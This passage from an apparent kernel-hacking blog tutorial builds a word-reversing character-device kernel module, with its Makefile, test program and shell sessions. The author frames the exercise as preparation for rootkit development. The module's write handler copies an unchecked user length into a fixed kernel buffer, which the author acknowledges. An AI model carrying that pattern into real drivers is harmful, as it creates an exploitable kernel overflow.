class="n"tmpdata/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"insert_word/spanspan class="p"(/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"ssize_t/spanspan class="w" /spanspan class="nf"reverse_read/spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"file/spanspan class="w" /spanspan class="o"*/spanspan class="n"filep/spanspan class="p",/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"buff/spanspan class="p",/spanspan class="kt"size_t/spanspan class="w" /spanspan class="n"count/spanspan class="p",/spanspan class="n"loff_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"offp/spanspan class="w" /spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="w" /spanspan class="n"copy_to_user/spanspan class="p"(/spanspan class="n"buff/spanspan class="p",/spanspan class="n"data/spanspan class="p",/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="w" /spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printk/spanspan class="p"(/spanspan class="w" /spanspan class="s"quot;Kernel -gt; userspace copy failed!/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="w" /spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"-1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"ssize_t/spanspan class="w" /spanspan class="nf"reverse_write/spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"file/spanspan class="w" /spanspan class="o"*/spanspan class="n"filep/spanspan class="p",/spanspan class="k"const/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"buff/spanspan class="p",/spanspan class="kt"size_t/spanspan class="w" /spanspan class="n"count/spanspan class="p",/spanspan class="n"loff_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"offp/spanspan class="w" /spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"DEVICE_SIZE/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="w" /spanspan class="n"copy_from_user/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p",/spanspan class="n"buff/spanspan class="p",/spanspan class="n"count/spanspan class="p")/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="w" /spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printk/spanspan class="p"(/spanspan class="w" /spanspan class="s"quot;Userspace -gt; kernel copy failed!/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="w" /spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"-1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"reverse/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"struct/spanspan class="w" /spanspan class="nc"file_operations/spanspan class="w" /spanspan class="n"reverse_fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"read/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_read/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"write/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_write/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"miscdevice/spanspan class="w" /spanspan class="n"reverse_misc_device/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"minor/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"MISC_DYNAMIC_MINOR/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"name/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="s"quot;reversequot;/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"reverse_fops/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="nf"reverse_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_register/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="nf"reverse_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_deregister/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"module_init/spanspan class="p"(/spanspan class="n"reverse_init/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"module_exit/spanspan class="p"(/spanspan class="n"reverse_exit/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h2Compiling The Device/h2 pAs with before, we'll need a codeMakefile/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nv"obj-m/span span class="o"+=/span hello.o/span span class="code-line"span class="nv"obj-m/span span class="o"+=/span reverse.o/span span class="code-line"/span span class="code-line"span class="nf"all/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span modules/span span class="code-line"/span span class="code-line"span class="nf"clean/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span clean/span span class="code-line"/code/pre/div /td/tr/table pAll that is left is to type codemake/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanmake/span span class="code-line"span class="go"make -C /lib/modules/3.12-kali1-686-pae/build M=/root/lkms modules/span/span span class="code-line"span class="go"make[1]: Entering directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"span class="go" CC [M] /root/lkms/reverse.o/span/span span class="code-line"span class="go" Building modules, stage 2./span/span span class="code-line"span class="go" MODPOST 2 modules/span/span span class="code-line"span class="go" LD [M] /root/lkms/reverse.ko/span/span span class="code-line"span class="go"make[1]: Leaving directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"/code/pre/div /td/tr/table h2Testing The Device/h2 pBefore we can test the device, we need an application that can read from and write to the device file, here is my application to do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;paths.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/stat.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;fcntl.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define CDEV_DEVICE quot;reversequot;/span/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"buf/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"argv/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: %s lt;stringgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="mi"1/spanspan class="p")/spanspan class="w" /spanspan class="o"gt;/spanspan class="w" /spanspan class="mi"512/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;ERROR: String too long/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"fd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"open/spanspan class="p"(/spanspan class="s"quot;/dev/quot;/spanspan class="w" /spanspan class="n"CDEV_DEVICE/spanspan class="p",/spanspan class="w" /spanspan class="n"O_RDWR/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;/dev/quot;/spanspan class="w" /spanspan class="n"CDEV_DEVICE/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;fd :%d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="n"fd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"read/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;read()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Before: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"write/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"],/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;write()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrote: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"read/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;read()quot;/spanspan class="p");/spanspan class="w" /span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w" /span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;After: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"close/spanspan class="p"(/spanspan class="n"fd/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;close()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis is a very basic application that uses the POSIX codeopen/code, coderead/code, codewrite/code and codeclose/code functions to use the device file. Also, I am implementing the bounds check here (on line 20) so I can't write any more than 512 bytes (the size of our character device datastore) but in a real situation you should implement the bounds checking in the LKM itself./p pNow we can test the LKM properly:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spangcc -o reverse-app reverse-app.c /span span class="code-line"span class="gp"root@dev:~/lkms# /spaninsmod ./reverse.ko/span span class="code-line"span class="gp"root@dev:~/lkms# /spanlsmod span class="p"|/span grep reverse/span span class="code-line"span class="go"reverse 12476 0 /span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l /dev/reverse /span span class="code-line"span class="go"crw------- 1 root root 10, 58 Jun 9 23:22 /dev/reverse/span/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-app /span span class="code-line"span class="go"Usage: ./reverse-app lt;stringgt;/span/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-app span class="s2"quot;I am testing my first character devicequot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;no data has been written yetquot;./span/span span class="code-line"span class="go"Wrote: quot;I am testing my first character devicequot;./span/span span class="code-line"span class="go"After: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-app span class="s2"quot;device character first my testing am Iquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="go"Wrote: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="go"After: quot;I am testing my first character devicequot;./span/span span class="code-line"/code/pre/div /td/tr/table pI check to see if the device file has been created on line 5, and looking at the output it has a major number of 10 and a minor number of 58. I then test it using the test application and it works perfectly./p pIts worth noting that you can delete the device file, recreate it and the data will remain there, this is because the data isn't stored in the file, but in the global character array in the LKM itself:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanrm /dev/reverse /span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l /dev/reverse /span span class="code-line"span class="go"ls: cannot access /dev/reverse: No such file or directory/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanmknod /dev/reverse c span class="m"10/span span class="m"58/span/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-app span class="s2"quot;Another test stringquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;I am testing my first character devicequot;./span/span span class="code-line"span class="go"Wrote: quot;Another test stringquot;./span/span span class="code-line"span class="go"After: quot;string test Anotherst character devicequot;./span/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-app span class="s2"quot;Another testquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;string test Anotherquot;./span/span span class="code-line"span class="go"Wrote: quot;Another testquot;./span/span span class="code-line"span class="go"After: quot;test AnotherAnotherquot;./span/span span class="code-line"/code/pre/div /td/tr/table pSomething funny happened while the application was reading from the device the second time, the data hadn't fully been written yet, this isn't really important to us (as our code is running in kernelland and will get the data straight away) but its worth knowing this if you are going to develop actual drivers and not just rootkits. As you can see though by the time I run the test application again, the data had been fully updated./p pLastly I'd just like to show you that you can create more than 1 device file in different locations, and even with different names, as long as the major and minor numbers are the same:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanmknod /root/mynewdevfile c span class="m"10/span span class="m"58/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l /dev/reverse/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:29 /dev/reverse/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l /root/mynewdevfile/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:39 /root/mynewdevfile/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spancp reverse-app.c reverse-app2.c/span span class="code-line"span class="gp"root@dev:~/lkms# /spanvim reverse-app2.c /span span class="code-line"span class="gp"root@dev:~/lkms# /spangcc -o reverse-app2 reverse-app2.c /span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-app2/span span class="code-line"span class="go"Usage: ./reverse-app2 lt;stringgt;/span/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-app2 span class="s2"quot;this is my last testquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;test Anotherquot;./span/span span class="code-line"span class="go"Wrote: quot;this is my last testquot;./span/span span class="code-line"span class="go"After: quot;test last my is thisquot;./span/span span class="code-line"span class="gp"root@dev:~/lkms# /span./reverse-app span class="s2"quot;test last my is thisquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;test last my is thisquot;./span/span span class="code-line"span class="go"Wrote: quot;test last my is thisquot;./span/span span class="code-line"span class="go"After: quot;this is my last testquot;./span/span span class="code-line"/code/pre/div /td/tr/table pHere I've just created a new a href="/assets/code/linux-kernel-hacking/reverse-app2.c"codereverse-app2.c/code/a so that it uses the device file at code/root/mynewdevfile/code. As you can see from the output of the applications that both device files are using the same datastore and they both do exactly the same thing./p pLastly, any extra device files will still exist after the LKM has been unloaded (and will need to be manually removed) but the original file (code/dev/reverse/code) will be automatically deleted:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanrmmod reverse/span span class="code-line"span class="gp"root@dev:~/lkms# /spanlsmod span class="p"|/span grep reverse/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l /dev/reverse/span span class="code-line"span class="go"ls: cannot access /dev/reverse: No such file or directory/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l /root/mynewdevfile/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:39 /root/mynewdevfile/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanrm /root/mynewdevfile/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l /root/mynewdevfile/span span class="code-line"span class="go"ls: cannot access /root/mynewdevfile: No such file or directory/span/span span class="code-line"/code/pre/div /td/tr/table h2Conclusion/h2 pCharacter devices can be very useful for userland/kernelland communication, this can be done with system calls to a degree but its a lot more difficult to implement a system call in an LKM./p pWhen doing any kernel development, the kernel source is a necessity, you can download it from https://www.kernel.org/, see what version of the kernel you have, using codeuname -r/code, and download the correct source. Getting used to the kernel source will make you a much better kernel developer and ultimately a better rootkit developer./p pLastly I'd like to highlight again that any form of kernel development is very 